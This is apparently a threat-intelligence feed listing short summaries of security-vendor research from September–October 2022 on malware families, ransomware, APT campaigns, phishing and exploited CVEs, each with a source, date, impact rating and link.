- Researchers from Fortinet have analyzed some malicious Microsoft Office documents that attempted to leverage legitimate websites to execute a shell script and then dropped two malware variants of Agent Tesla and njRat.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Bumblebee_malware_continues_to_expand_its_capabilities
- Date of Scan:
- 2022-10-04
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have observed the changes in the behavior of Bumblebee’s servers that occurred around June 2022 indicating that the attackers may have shifted their focus from extensive testing of their malware to reaching as many victims as possible.
Source:
https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/
—
- Intel Source:
- Microsoft
- Intel Name:
- North_Korean_Hackers_Leveraging_Open_Source_Software
- Date of Scan:
- 2022-10-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Microsoft have observed that Zinc threat actor leveraging a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for the attacks.
Source:
https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/
—
- Intel Source:
- BlackBerry
- Intel Name:
- New_variant_of_ransomware_dubbed_DJVU
- Date of Scan:
- 2022-10-04
- Impact:
- MEDIUM
- Summary:
- BlackBerry researchers have identified a new DJVU ransomware that includes several layers of obfuscation. The threat group connected with other threats, giving them the option to download and deploy information stealers to exfiltrate data, giving threat actors a second way to benefit at victims’ expense.
Source:
https://blogs.blackberry.com/en/2022/09/djvu-the-ransomware-that-seems-strangely-familiar
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- Lazarus_group_exploiting_Dell_Driver_Vulnerability_to_Disable_Windows_Security
- Date of Scan:
- 2022-10-04
- Impact:
- MEDIUM
- Summary:
- ESET researchers have identified the Lazarus group deploying a tool on target systems that exploits the Dell DBUtil flaw to disable the monitoring of all security solutions on compromised machines, using never-before-seen techniques against Windows kernel mechanisms.
Source:
https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/
—
- Intel Source:
- Sygnia
- Intel Name:
- Linux_ransomware_Cheerscrypt_linked_with_Chinese_DEV_0401_APT_group
- Date of Scan:
- 2022-10-04
- Impact:
- LOW
- Summary:
- Researchers from Sygnia have investigated the Cheerscrypt ransomware attack which utilized Night Sky ransomware TTPs and, found Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10).
Source:
https://blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-group
—
- Intel Source:
- Securelist
- Intel Name:
- Diving_Deep_into_DeftTorero_Actor
- Date of Scan:
- 2022-10-04
- Impact:
- LOW
- Summary:
- Researchers from Securelist have deeply analyzed the DeftTorero threat actor (aka Lebanese Cedar, Volatile Cedar) and it is believed to originate from the Middle East.
Source:
https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/
—
- Intel Source:
- GTSC
- Intel Name:
- Unpatched_Microsoft_Exchange_Zero-Day_Under_Active_Exploitation
- Date of Scan:
- 2022-10-03
- Impact:
- MEDIUM
- Summary:
- Researchers from GTSC have identified the flaws in fully patched Microsoft Exchange servers being exploited by malicious actors in real-world attacks to achieve remote code execution on affected systems.
—
- Intel Source:
- Mandiant
- Intel Name:
- A_deploying_malware_on_the_ESXi_Hypervisors
- Date of Scan:
- 2022-10-03
- Impact:
- LOW
- Summary:
- Mandiant is investigating Novel Malware wich being persistence within ESXi Hypervisors. Mandiant tracked this actvity with the threat actor group UNC3886. Given the highly targeted and evasive nature of this intrusion, Mandiant suspects UNC3886 motivation to be cyber espionage related.
Source:
https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence
—
- Intel Source:
- Lumen
- Intel Name:
- New_Go_Based_Malware_Targeting_Windows_and_Linux_Systems
- Date of Scan:
- 2022-10-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Lumen have identified a new multi-functional Go-based malware named Chaos. The malware is rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet.
—
- Intel Source:
- Esentire
- Intel Name:
- Mozilla_Thunderbird_distributing_Redline_Stealer
- Date of Scan:
- 2022-10-03
- Impact:
- LOW
- Summary:
- Researchers from Esentire have discovered some of the most dangerous threats including the Kaseya MSP breach and the more_eggs malware in the recent analysis.
Source:
https://www.esentire.com/blog/redline-stealer-and-mozilla-thunderbird
—
- Intel Source:
- Symantec
- Intel Name:
- Malware_hidden_in_Windows_logo_in_cyber_attacks_against_Middle_Eastern_governments
- Date of Scan:
- 2022-10-03
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have observed threat actors using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo in its attacks against Middle Eastern governments.
—
- Intel Source:
- Securonix
- Intel Name:
- Hackers_Targeting_Military_and_Weapons_Contractors
- Date of Scan:
- 2022-10-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Securonix have identified a new phishing campaign targeting multiple military contractors involved in weapon manufacturing, including an F-35 Lightning II fighter aircraft components supplier.
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_malicious_decentralized_application_websites_abused_by_Water_Labbu
- Date of Scan:
- 2022-10-03
- Impact:
- LOW
- Summary:
- TrendMicro discovered a threat actor and named Water Labbu that was targeting cryptocurrency scam website
—
- Intel Source:
- Disinfo Lab
- Intel Name:
- Media_clones_serving_Russian_propaganda_in_Europe
- Date of Scan:
- 2022-10-03
- Impact:
- LOW
- Summary:
- EU DisinfoLab researchers have investigated a large disinformation campaign targeting western audiences with pro-Russian propaganda.
Source:
https://www.disinfo.eu/wp-content/uploads/2022/09/Doppelganger-1.pdf
—
- Intel Source:
- SentinelOne
- Intel Name:
- North_Korea_Lazarus_Hackers_Targeting_macOS_Users
- Date of Scan:
- 2022-10-03
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have reviewed the details of Operation In(ter)ception campaign and observed a further variant in the same campaign using lures for open positions at rival exchange Crypto.com
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_ransomware_Bl00dy
- Date of Scan:
- 2022-10-03
- Impact:
- LOW
- Summary:
- Researchers from Cyble have identified a new ransomware named “Bl00dy” that is targeting organizations using double extortion techniques. A ransom note is created on the system to demand payment for the encrypted files. After the ransomware encrypts the files, it appends their extension with “.bl00dy.”
Source:
https://blog.cyble.com/2022/09/28/bl00dy-new-ransomware-strain-active-in-the-wild/
—
- Intel Source:
- Multiple
- Intel Name:
- LockBit_3_0_aka_LockBit_Black
- Date of Scan:
- 2022-09-30
- Impact:
- MEDIUM
- Summary:
- Researchers have analyzed the LockBit and identified it is back with LockBit 3.0
Source:
https://docs.google.com/spreadsheets/d/1Now95XPSkvEiCJy5H5iqgTDKi_ATZeBY_PhnxSUhWl8/edit#gid=0
—
- Intel Source:
- Cisco Talos
- Intel Name:
- A_new_Cobalt_Strike_payload_campaign
- Date of Scan:
- 2022-09-30
- Impact:
- MEDIUM
- Summary:
- Researchers from Cisco have discovered a campaign that is delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
Source:
https://blog.talosintelligence.com/2022/09/new-campaign-uses-government-union.html
—
- Intel Source:
- Sucuri
- Intel Name:
- New_Malware_Variants_Deliver_Fake_Cloudflare_DDoS_Captcha
- Date of Scan:
- 2022-09-30
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have identified the user is prompted with a bogus Cloudflare DDoS protection screen, but in this new wave, they observed a fake CAPTCHA dialog masquerading as the popular Cloudflare service.
Source:
https://blog.sucuri.net/2022/09/new-malware-variants-serve-bogus-cloudflare-ddos-captcha.html
—
- Intel Source:
- Zscaler
- Intel Name:
- Hackers_using_Quantum_Builder_to_deliver_Agent_Tesla_RAT
- Date of Scan:
- 2022-09-30
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz researchers have observed a campaign that delivers Agent Tesla, a .NET-based keylogger and remote access trojan (RAT), using a builder named “Quantum Builder” sold on the dark web.
Source:
https://www.zscaler.com/blogs/security-research/agent-tesla-rat-delivered-quantum-builder-new-ttps
—
- Intel Source:
- Palo Alto
- Intel Name:
- Polyglot_File_Delivering_IcedID
- Date of Scan:
- 2022-09-30
- Impact:
- LOW
- Summary:
- PaloAlto researchers have observed a polyglot Microsoft Compiled HTML Help file being employed in the infection process used by the information stealer IcedID.
Source:
https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/
—
- Intel Source:
- Cyble
- Intel Name:
- Detecting_and_Removing_Malicious_Software_Masquerading_as_Doenerium_Stealer
- Date of Scan:
- 2022-09-30
- Impact:
- LOW
- Summary:
- A spear phishing email campaign targeting Office365 users hve observed by Cyble researchers. The same domain has also been onserved hosting several other malware variants, such as Doenerium stealer.
Source:
https://blog.cyble.com/2022/09/28/new-information-stealer-targeting-crypto-wallets/
—
- Intel Source:
- Crowdstrike
- Intel Name:
- The_examination_of_Wiper_Malware_Part_3
- Date of Scan:
- 2022-09-30
- Impact:
- LOW
- Summary:
- Researchers from CrowdStrike have covered various input/output controls (IOCTLs) in more detail and how they are used to achieve different goals — including acquiring information about infected machines and locking/unlocking disk volumes, among others.
Source:
https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/
—
- Intel Source:
- Palo Alto
- Intel Name:
- Finding_APTs_using_Unsigned_DLLs_Loader
- Date of Scan:
- 2022-09-30
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have observed a method called “unsigned DLL loading” which is the technique to evade detection and execute more sophisticated attacks.
—
- Intel Source:
- ASEC
- Intel Name:
- LockBit_3_0_Ransomware_Spreading_via_Word_Documents
- Date of Scan:
- 2022-09-29
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that LockBit 3.0 ransomware distributed while disguised as job application emails in NSIS format is also being distributed in Word document format.
Source:
https://asec.ahnlab.com/en/39242/
https://asec.ahnlab.com/en/39259/
—
- Intel Source:
- SentinelOne
- Intel Name:
- Void_Balaur_hack_for_hire_campaigns
- Date of Scan:
- 2022-09-29
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have observed the cyber mercenary group known as Void Balaur continues to expand its hack-for-hire campaigns and targeting of a wide variety of individuals and organizations across the globe.
Source:
https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/
—
- Intel Source:
- Securelist
- Intel Name:
- Mass_Emailing_campaign_delivering_Agent_Tesla_malware
- Date of Scan:
- 2022-09-28
- Impact:
- LOW
- Summary:
- Researchers from Securelist have discovered a spam campaign that delivers Agent Tesla malware. After analysis, the email messages were pretended as high-quality imitations of business inquiries by real companies.
Source:
https://securelist.com/agent-tesla-malicious-spam-campaign/107478/
—
- Intel Source:
- Securelist
- Intel Name:
- A_Trojan_Downloader_Named_NullMixer
- Date of Scan:
- 2022-09-28
- Impact:
- LOW
- Summary:
- Researchers from Securelist have identified a large proportion of the malware families dropped by NullMixer are classified as Trojan-Downloaders.
Source:
https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/
—
- Intel Source:
- ReversingLab
- Intel Name:
- Malicious_NPM_package_discovered_in_supply_chain_attack
- Date of Scan:
- 2022-09-28
- Impact:
- MEDIUM
- Summary:
- Researchers from ReversingLabs have identified the Material Tailwind library is being impersonated for an apparent supply chain attack targeting developers. The team spotted a look-alike NPM package circulating on repositories, intended to trick unwitting developers into using the package in place of the real library.
—
- Intel Source:
- Cluster25
- Intel Name:
- A_new_variant_of_Graphite_Malware
- Date of Scan:
- 2022-09-28
- Impact:
- MEDIUM
- Summary:
- Cluster25 researchers have analyzed a lure document used to implant a variant of Graphite malware, which is linked to the threat actor known as APT28.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Floxif_Malware_Family_Leveraging_Cookies
- Date of Scan:
- 2022-09-27
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a recently disclosed vulnerability by Vectra that affects Microsoft Teams.
Source:
https://isc.sans.edu/forums/diary/Kids+Like+Cookies+Malware+Too/29082/
—
- Intel Source:
- GitHub Blog
- Intel Name:
- Phishing_Campaign_Targeting_GitHub_Accounts
- Date of Scan:
- 2022-09-27
- Impact:
- LOW
- Summary:
- Researchers from GitHub security team have identified that the hackers are targeting GitHub users to steal credentials and two-factor authentication (2FA) codes by impersonating the CircleCI DevOps platform.
Source:
https://github.blog/2022-09-21-security-alert-new-phishing-campaign-targets-github-users/
—
- Intel Source:
- DFIR Report
- Intel Name:
- BumbleBee_Malware_Deploying_Cobalt_Strike_and_Meterpreter
- Date of Scan:
- 2022-09-27
- Impact:
- LOW
- Summary:
- Researchers from DFIR have identified threat actors using BumbleBee malware to deploy Cobalt Strike and Meterpreter. They used RDP and SMB to move around the network looking at backup systems and file shares before being evicted from the network.
Source:
https://thedfirreport.com/2022/09/26/bumblebee-round-two/
—
- Intel Source:
- ASEC
- Intel Name:
- FARGO_Ransomware_Targeting_Vulnerable_Microsoft_SQL_Servers
- Date of Scan:
- 2022-09-27
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the distribution of FARGO ransomware that is targeting vulnerable MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware that targets vulnerable MS-SQL servers.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Chinese_Hacker_Group_TA413_Evolves_Capabilities_to_Targeting_Tibetan
- Date of Scan:
- 2022-09-26
- Impact:
- LOW
- Summary:
- RecordedFuture researchers have observed the targeting of ethnic and religious minority communities by Chinese state-sponsored groups for surveillance and intelligence-gathering purposes.
—
- Intel Source:
- SentinelOne
- Intel Name:
- New_Hacking_Group_Metador_Targeting_Telecommunications_ISPs_and_Universities
- Date of Scan:
- 2022-09-26
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have discovered a new threat actor named Matador and targeting telecommunications, internet service providers, and universities in several countries in the Middle East and Africa.
Source:
https://assets.sentinelone.com/sentinellabs22/metador
—
- Intel Source:
- Cybergeeks
- Intel Name:
- A_Technical_Analysis_of_Lockbit_3_0_Builder
- Date of Scan:
- 2022-09-26
- Impact:
- LOW
- Summary:
- Researchers from Cybergeeks have analyzed LockBit 3.0 builder that was leaked online on 21st September 2022.
Source:
https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/
—
- Intel Source:
- Symantec
- Intel Name:
- Noberus_Ransomware_Continues_to_Develop_its_TTPs
- Date of Scan:
- 2022-09-26
- Impact:
- LOW
- Summary:
- Symantec researchers have identified that the Noberus (aka BlackCat, ALPHV) ransomware is using new tactics, tools, and procedures in recent months which making the threat more dangerous than ever.
—
- Intel Source:
- Morphisec
- Intel Name:
- NFT_Malware_Gets_New_Evasion_Abilities
- Date of Scan:
- 2022-09-26
- Impact:
- LOW
- Summary:
- Researchers from Morphisec have tracked several waves of the NFT malware delivering the Remcos RAT. In June 2022 they found a shift in the crypter used to deliver the Remcos RAT. The Babadeda crypter has now been discarded for a newly staged downloader.
Source:
https://blog.morphisec.com/nft-malware-new-evasion-abilities
—
- Intel Source:
- Sansec
- Intel Name:
- Cybercriminals_target_Magento_vulnerability_in_new_wave_of_attacks
- Date of Scan:
- 2022-09-26
- Impact:
- LOW
- Summary:
- Researchers from Sansec have observed a surge in hacking attempts targeting CVE-2022-24086, a critical Magento 2 vulnerability allowing unauthenticated attackers to execute code on unpatched sites.
Source:
https://sansec.io/research/magento-2-template-attacks
—
- Intel Source:
- BitSight
- Intel Name:
- SystemBC_Malware_Turns_Infected_Computers_into_SOCKS5_Proxies
- Date of Scan:
- 2022-09-23
- Impact:
- LOW
- Summary:
- BitSight researchers have observed that SystemBC malware still turns infected computers into SOCKS5 proxy servers. Most bots cannot be reached from the internet, so this malware uses a backconnect architecture that allows clients to access proxy servers without having to interact directly with them.
Source:
https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes
—
- Intel Source:
- Palo Alto
- Intel Name:
- Cybercriminals_are_Increasingly_Using_Domain_Shadowing
- Date of Scan:
- 2022-09-23
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have discovered that domain shadowing is more widespread than previously thought, discovering 12,197 cases between April and June 2022.
Source:
https://unit42.paloaltonetworks.com/domain-shadowing/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- FODHelper_Delivering_Remcos_RAT
- Date of Scan:
- 2022-09-23
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified a simple batch file that drops a Remcos RAT through an old UAC Bypass technique.
—
- Intel Source:
- ASEC
- Intel Name:
- A_Deep_Analysis_of_Lazarus_Group_Rootkit_Attack_Using_BYOVD
- Date of Scan:
- 2022-09-23
- Impact:
- LOW
- Summary:
- Researchers from ASEC have done a deep analysis of Lazarus Group Rootkit Attack using BYOVD. They are known to be hackers from North Korea, who have attacked various countries in America, Asia, and Europe.
—
- Intel Source:
- CISA
- Intel Name:
- Iranian_hackers_Conduct_Cyber_Operations_Against_the_Government_of_Albania
- Date of Scan:
- 2022-09-22
- Impact:
- MEDIUM
- Summary:
- Researchers from CISA have identified one of the Iranian threat groups behind the destructive attack on the Albanian government’s network in July lurking inside its systems for roughly 14 months.
—
- Intel Source:
- Cyble
- Intel Name:
- Distribution_of_NetSupport_RAT_via_SocGholish
- Date of Scan:
- 2022-09-22
- Impact:
- LOW
- Summary:
- Researchers from Cyble have observed that hackers are using fake browser update (SocGholish) to deliver the NetSupport RAT.
Source:
https://blog.cyble.com/2022/09/21/netsupport-rat-distributed-via-socgholish/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Active_Exploitation_of_Atlassian_Confluence_Vulnerability
- Date of Scan:
- 2022-09-22
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro have observed the active exploitation samples abusing the Atlassian Confluence vulnerability (CVE-2022-26134) in the wild for malicious cryptocurrency mining.
—
- Intel Source:
- Zscaler
- Intel Name:
- Diving_Deep_into_Crytox_Ransomware
- Date of Scan:
- 2022-09-22
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have done technical analysis of Crytox Ransomware which is multi-stage ransomware with a weak key generation algorithm.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware
—
- Intel Source:
- Cofense
- Intel Name:
- Hackers_Abusing_LinkedIn_Slink_to_Bypass_Secure_Email_Gateway
- Date of Scan:
- 2022-09-22
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign that abuses LinkedIn smart links. While exploiting a well-known postal brand is nothing out of the ordinary, these phishing emails continue to pass undetected by popular email gateways.
Source:
https://cofense.com/blog/threat-actors-abuse-linkedin-slink-to-bypass-secure-email-gateways
—
- Intel Source:
- Fortinet
- Intel Name:
- Konni_(RAT)_phishing_activity
- Date of Scan:
- 2022-09-21
- Impact:
- LOW
- Summary:
- Researchers at Fortinet recently caught a sophisticated phishing attempt deploying malware which they tied to APT 37 group’s arsenal related to Konni and other RAT.
Source:
https://www.fortinet.com/blog/threat-research/konni-rat-phishing-email-deploying-malware
—
- Intel Source:
- Cyble
- Intel Name:
- Zoom_Users_Targeted_by_Vidar_Stealer
- Date of Scan:
- 2022-09-21
- Impact:
- MEDIUM
- Summary:
- The researchers from Cyble have observed numerous fake Zoom sites that look exactly like the real Zoom sites. The purpose of these sites is to distribute malware disguised as the legitimate Zoom application.
Source:
https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_file_extension_changed_from_jse_to_js
- Date of Scan:
- 2022-09-21
- Impact:
- LOW
- Summary:
- Researchers from ASEC have analyzed the Magniber ransomware script and found that is still a javascript but its file extension changed from *.jse to *.js.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Attackers_Leveraging_Free_Online_Resources_for_Phishing_Campaigns
- Date of Scan:
- 2022-09-21
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed phishing campaigns using free online resources.
Source:
https://isc.sans.edu/forums/diary/Phishing+Campaigns+Use+Free+Online+Resources/29074/
—
- Intel Source:
- Recorded Future
- Intel Name:
- Attackers_Abusing_Google_Tag_Manager_Payment_Card_E-Skimming
- Date of Scan:
- 2022-09-21
- Impact:
- LOW
- Summary:
- According to Recorded Future researchers, 569 e-commerce domains have been infected by Magecart e-skimmers that exfiltrate stolen payment card information to GTM-based e-skimmer domains.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2022-0920.pdf
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Hackers_Leveraging_Browser_Extensions
- Date of Scan:
- 2022-09-21
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have detected a browser extension named PUP.Optional.AdMax. They have claimed to be adblockers and do have some, limited, functionality.
Source:
https://www.malwarebytes.com/blog/detections/pup-optional-admax
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Ragnar_Locker_ransomware_roundup_cover
- Date of Scan:
- 2022-09-20
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs gathered data on ransomware variants of interest that have been gaining traction within the OSINT community and our datasets. The Ransomware Roundup report aimed the Ragnar Locker ransomware to provide readers with brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against this variant.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-ragnar-locker-ransomware
—
- Intel Source:
- Cyble
- Intel Name:
- Fake_Telegram_Site_Delivering_RAT
- Date of Scan:
- 2022-09-20
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs team identified a fake Telegram website masquerading as a legitimate website that downloads a malicious installer. This installer abuses the Windows Defender application to perform RAT operations.
Source:
https://blog.cyble.com/2022/09/17/fake-telegram-site-delivering-rat-aimed-at-chinese-users/
—
- Intel Source:
- Fortinet
- Intel Name:
- Multiple_Malwares_delivered_by_Excel_Document
- Date of Scan:
- 2022-09-20
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs recently caught captured an Excel document with an embedded malicious file in the wild. After some research on the file, Fortinet reserachers learned that it exploits a particular vulnerability —CVE-2017-11882—to execute malicious code which affecting Microoft Windows platforms and Windows users. Researchers picked the “lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe” file (being saved as “C:\Users\{UserName}\AppData\Roaming\word.exe”) as an example to analyze. It is the latest Formbook sample in the malware sample logs.
—
- Intel Source:
- Cofense
- Intel Name:
- Microsoft_365_Phishing_Attacks_Targeting_US_Government_Agencies
- Date of Scan:
- 2022-09-20
- Impact:
- MEDIUM
- Summary:
- Cofense researchers have identified an ongoing phishing campaign targeting U.S. government contractors. In these phishing emails, scammers ask for bids for lucrative government projects, leading users to cloned versions of legitimate government websites.
Source:
https://cofense.com/blog/credential-phishing-targeting-government-contractors-evolves-over-time
—
- Intel Source:
- BlackBerry
- Intel Name:
- Monster_RaaS_campaign_returned_as_a_new_variant
- Date of Scan:
- 2022-09-20
- Impact:
- MEDIUM
- Summary:
- BlackBerry Research & Intelligence team examined all samples about Monster ransomware which is delivered as a 32-bit binary. A hidden user interface gives threat actors control of multiple features of the ransomware on a victim’s machine, including selective encryption, self-deletion, and control over services and processes. Monster is also highly configurable, so threat actors can set their own custom extension and personalized ransom note.
—
- Intel Source:
- VMware
- Intel Name:
- The_Growth_of_Chromeloader_Malware
- Date of Scan:
- 2022-09-20
- Impact:
- LOW
- Summary:
- Researchers from VMware have analyzed Chromeloader malware and warned of an ongoing campaign, In the campaign, malicious browser extensions, malware based on node-WebKit, and ransomware are being distributed.
Source:
https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Preventing_ISO_Malware
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Russia-Nexus_UAC-0113_Emulating_Telecommunication_Providers_in_Ukraine
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- Researchers at Insikt Group while monitoring UAC-0113 infrastructure, including the recurring use of dynamic DNS domains masquerading as telecommunication providers operating in Ukraine, which shows that the group’s efforts to target entities in Ukraine remains ongoing. Domain masquerades can enable spearphishing campaigns or redirects that pose a threat to victim networks.
Source:
https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine
https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf
—
- Intel Source:
- Securelist
- Intel Name:
- The_widespread_of_RedLine_stealer
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- Securelist’s reserachers recently caught a suspicious activity which was a part of collection of malicious programs distributed in the form of a single installation file, self-extracting archive or other file with installer-type functionality.
Source:
https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_details_of_a_Publicly_Available_Slam_Ransomware_Builder
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- SentinelOne analysts detailed out thoroughly about Slam Ransomware Builder and how free ransomware builders like Slam offer an easy route into cybercrime and yet present a credible threat to organizations and enterprises. Plus they provided a detailed list of indicators to help security teams detect and protect against Slam ransomware payloads.
—
- Intel Source:
- Aquasec
- Intel Name:
- TeamTNT_threat_actors_targeting_cloud_environments
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- Aquasec analysts observed and analyzed three different attacks on their honeypots past week. The scripts and malware that were used bear a striking resemblance to none other than the threat actor TeamTNT.
Source:
https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt
—
- Intel Source:
- ISC.SANS
- Intel Name:
- PreventingISOMalware
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Word_Maldoc_With_CustomXML_and_Renamed_VBAProject
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed samples and found one of them is that the VBA project file (ole file) is named FIzzyWAbnj.bin instead of the usual VBAProject.bin.
—
- Intel Source:
- Sekoia
- Intel Name:
- PrivateLoader_the_most_widely_used_loader_in_2022
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- PrivateLoader became one of the most widespread loaders used for a PPI service in 2022. SEKOIA analysts tracked PrivateLoader’s network infrastructure for several months and recently conducted an in-depth analysis of the malware. In parallel, we also monitored activities related to the ruzki PPI malware service.
Source:
https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Russia_linked_Gamaredon_APT_Targeting_Ukraine_Using_InfoStealer_Malware
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- Researchers at CiscoTalos have observed that Russian-linked Gamaredon has been targeting Ukrainian government, defense, and law enforcement agencies with a piece of a custom-made information stealer implant.
Source:
https://blog.talosintelligence.com/2022/09/gamaredon-apt-targets-ukrainian-agencies.html
—
- Intel Source:
- Cloudsek
- Intel Name:
- Revived_Version_of_Raccoon_Stealer
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- CloudSEK researchers analyzed a Raccoon malware sample and found it to be an updated version of Raccoon stealer. In underground forums, the developer of Raccoon stealer is very active, regularly updating the malware and posting about new feature builds.
—
- Intel Source:
- Netscope
- Intel Name:
- Hackers_Continue_to_Abuse_Google_Sites_and_Microsoft_Azure
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- Netskope researchers discovered a phishing campaign where attackers are abusing Google Sites and Microsoft Azure Web Apps to steal cryptocurrency wallets and accounts from Coinbase, MetaMask, Kraken, and Gemini.
—
- Intel Source:
- JPCERT
- Intel Name:
- BlackTech_Threat_Group_ExploitsF5_BIG-IP_Vulnerability
- Date of Scan:
- 2022-09-16
- Impact:
- MEDIUM
- Summary:
- The JPCERT have identified an attack activity exploiting the F5 BIG-IP vulnerability (CVE-2022-1388) against Japanese organizations. It has been confirmed by the targeted organizations that data in BIG-IP has been compromised.
Source:
https://blogs.jpcert.or.jp/en/2022/09/bigip-exploit.html
—
- Intel Source:
- Mandiant
- Intel Name:
- Trojanized_Putty_through_Phishing
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- Researchers from Mandiant identified a Trojanized Putty ISO payload being delivered through a fabricated job lure spear employed by the threat cluster tracked as UNC4034, suspected to be a part of “Operation Dream Job” campaigns.
Source:
https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Scammers_Abuse_Microsoft_Edge’s_News_Feed_Ads
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have identified an ongoing malvertising campaign that is injecting ads in the Microsoft Edge News Feed to redirect potential victims to websites pushing tech support scams.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malicious_Word_Document_With_a_Frameset
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- SANS researchers have discovered a malicious Word OOXML document (the new “.docx” format) that is a simple downloader. No malicious code is contained in this document, but merely a reference to a second stage which will be delivered when the document is opened.
—
- Intel Source:
- Cybereason
- Intel Name:
- Exploiting_Notepad++_Plugins_for_Evasion_and_Persistence
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Researchers from Cybereason have analyzed a specific technique that leverages Notepad++ plugins to persist and evade security mechanisms on a machine.
—
- Intel Source:
- Symantec
- Intel Name:
- Webworm_hackers_modify_old_malware_in_new_attacks
- Date of Scan:
- 2022-09-15
- Impact:
- LOW
- Summary:
- Researcher from Symantec have observed that the Chinese ‘Webworm’ hacking group is experimenting with customizing old malware in new attacks, likely to evade attribution and reduce operations costs.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats
—
